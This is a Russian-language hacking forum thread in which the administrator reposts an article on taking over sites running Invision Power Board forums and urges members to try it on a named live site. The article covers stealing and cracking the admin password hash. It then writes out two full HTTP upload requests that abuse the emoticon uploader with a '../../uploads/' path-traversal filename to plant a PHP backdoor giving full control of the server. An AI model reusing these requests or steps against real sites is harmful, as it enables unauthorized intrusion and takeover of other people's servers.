On-line: гостей 0. Всего: 0 [подробнее..]
АвторСообщение
Админ и стратор!!
www.GFAQ.ru





Не зарегистрирован
Зарегистрирован: 01.01.70
Рейтинг: 0
ссылка на сообщение  Отправлено: 20.05.06 01:40. Заголовок: }{/\|{EPC|{ИE CТАТЬИ!!


Здесь будет всё о хакерстве!!

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Ответов - 25 , стр: 1 2 3 All [только новые]


Админ и стратор!!
www.GFAQ.ru





Пост N: 788
Зарегистрирован: 02.05.06
Откуда: РФ, Гусев
Рейтинг: 0
ссылка на сообщение  Отправлено: 06.01.07 20:27. Заголовок: Re:


c@sillias Ты напиши статью в TOF - было бы интересно, и полезно для журнала. Глядишь и TOF станет "хакером".


Вот эта статья очень полезна и серьёзна:
Кто хочет, пусть экспирементирует, например, на http://bit16.info (Русская версия Invision Power Board v2.1.6 © 2007 IPS, Inc.)


 цитата:
Захват сайтов, использующих форум Invision Power Board

Автор: Algol


В статье описывается захват сайта, использующего форум Invision Power Board.

Внимание: статья написана в ознакомительных целях. Не пытайтесь использовать данную статью в целях взлома сайтов, это уголовно наказуемо.

Целью наших действий будет загрузка на удаленный сайт PHP-скрипта, дающего доступ к файловой системе сервера (т.н. backdoor).

Метод взлома
Захват сайта осуществляется в два этапа. Первый - получение логина и пароля администратора форума. Второй - загрузка на сайт специального php-скрипта, позволяющего оперировать файлами сервера.
В статьях на нашем сайте уже писалось про XSS уязвимости форумов IPB (ссылка), и демонстрировался механизм получения прав модератора форума. Уязвимости позволяют нам, также, получить хеш-код пароля администратора. Если хеш в наших руках, можем двигаться дальше.

Для администраторов, форум IPB использует двойную защиту: сначала нужно зайти на сайт под логином/паролем администратора, а затем для входа в админку требуется снова ввести логин/пароль для получения администраторской сессии. Таким образом, одного только хеш-кода пароля мало для доступа к админке форума. Хеш код нужно расшифорвать. Для расшифровки хеша можно воспользоваться, например, програмкой MD5Inside.

После расшифровки хеша, мы получаем доступ к панели управления форумом. Наша цель- залить на сайт файл с расширением php. Это может оказаться непросто, поскольку админка IPB предусматривает изменения только HTML-шаблонов, но не PHP скриптов. Однако, такая возможность все таки существует.
Один из способов загрузки произвольных PHP скриптов на сайт, осуществляется через меню Manage emoticons. Внизу мы видим форму для отправки смайликов на сервер. Защиты на тип файлов для смайликов, в IPB не предусмотрено, поэтому без труда можно залить файл произвольного типа.

Если загрузка удалась, то к файлу будет доступ по адресу http://someSiteForum/html/emoticons/myFile.php, и взлом можно считать законченным. Однако, возможна такая ситуация, что запись в папку emoticons запрещена. В таком случае воспользуемся обходным маневром, и запишем файл в ту папку, которая открыта на запись. А такая папка всегда существует в IPB, и называется uploads. Эта папка используется для хранения аватаров пользователей и для хранения присоединенных к постингам файлов. Понятное дело, что эта папка всегда открыта для записи.
Для загрузки файла в папку uploads используем все ту же форму для загрузки смайликов. Несмотря на то, что эта форма предназначена дла загрузки файлов только в папку html/emoticons, это органичение можно обойти, подделав HTTP запрос.

Исходный запрос для загрузки файла выглядит следующим образом:

POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="c:/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--

Обратим внимание на фрагмент запроса filename="c:/myFile.php". Этот фрагмент автоматически посылается браузером, и содержит полное локальное имя отсылаемого файла. При приеме запроса, сервер отбрасывает локальную часть пути и сохраняет файл под именем myFile.php в папке html/emoticons. Но если в качестве имени файла передать например такой filename="../myFile.php", то сервер не отбрасывает путь, поскольку он не является локальным, и загружает файл в папку, по указанному пути, относительно папки html/emoticons. Таким образом, послав модифицированный запрос, мы сможем загрузить произвольный файл в произвольную папку сервера.
Для загрузки скрипта в папку uploads, использовался такой запрос:

POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--

Для отсылки модифицированного запроса, использовалась программа InetCrack.
После загрузки на сервер PHP-скрипта типа remview.php(удаленный файловый web-менеджер), который будет доступен по адресу http://someSiteForum/uploads/remview.php, мы получаем полный контроль над сайтом.



Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
постоянный участник




Пост N: 15
Зарегистрирован: 01.01.07
Рейтинг: 0
ссылка на сообщение  Отправлено: 07.01.07 13:26. Заголовок: Re:


TiberiyLTim пишет:

 цитата:
c@sillias Ты напиши статью в TOF - было бы интересно, и полезно для журнала. Глядишь и TOF станет "хакером".


В принципе, можно...

Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Пост N: 800
Зарегистрирован: 02.05.06
Откуда: РФ, Гусев
Рейтинг: 0
ссылка на сообщение  Отправлено: 07.01.07 15:00. Заголовок: Re:


c@sillias пишет:

 цитата:
В принципе, можно...

Ну, мы всегда рады такой науке как хакерство, и не важно в какой области - взлом или что ещё...

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
постоянный участник




Пост N: 18
Зарегистрирован: 01.01.07
Рейтинг: 0
ссылка на сообщение  Отправлено: 07.01.07 15:03. Заголовок: Re:


Давай только не в этот номер... :)

Спасибо: 0 
ПрофильЦитата Ответить
Админ и стратор!!
www.GFAQ.ru





Пост N: 802
Зарегистрирован: 02.05.06
Откуда: РФ, Гусев
Рейтинг: 0
ссылка на сообщение  Отправлено: 07.01.07 15:20. Заголовок: Re:


c@sillias пишет:

 цитата:
Давай только не в этот номер... :)

как тебе угодно.

Каждый из нас - это один, но все мы вместе - это МЫ!! Спасибо: 0 
ПрофильЦитата Ответить
Ответов - 25 , стр: 1 2 3 All [только новые]
Ответ:
1 2 3 4 5 6 7 8 9
большой шрифт малый шрифт надстрочный подстрочный заголовок большой заголовок видео с youtube.com картинка из интернета картинка с компьютера ссылка файл с компьютера русская клавиатура транслитератор  цитата  кавычки моноширинный шрифт моноширинный шрифт горизонтальная линия отступ точка LI бегущая строка оффтопик свернутый текст

показывать это сообщение только модераторам
не делать ссылки активными
Имя, пароль:      зарегистрироваться    
Тему читают:
- участник сейчас на форуме
- участник вне форума
Все даты в формате GMT  3 час. Хитов сегодня: 13
Права: смайлы да, картинки да, шрифты да, голосования нет
аватары да, автозамена ссылок вкл, премодерация откл, правка нет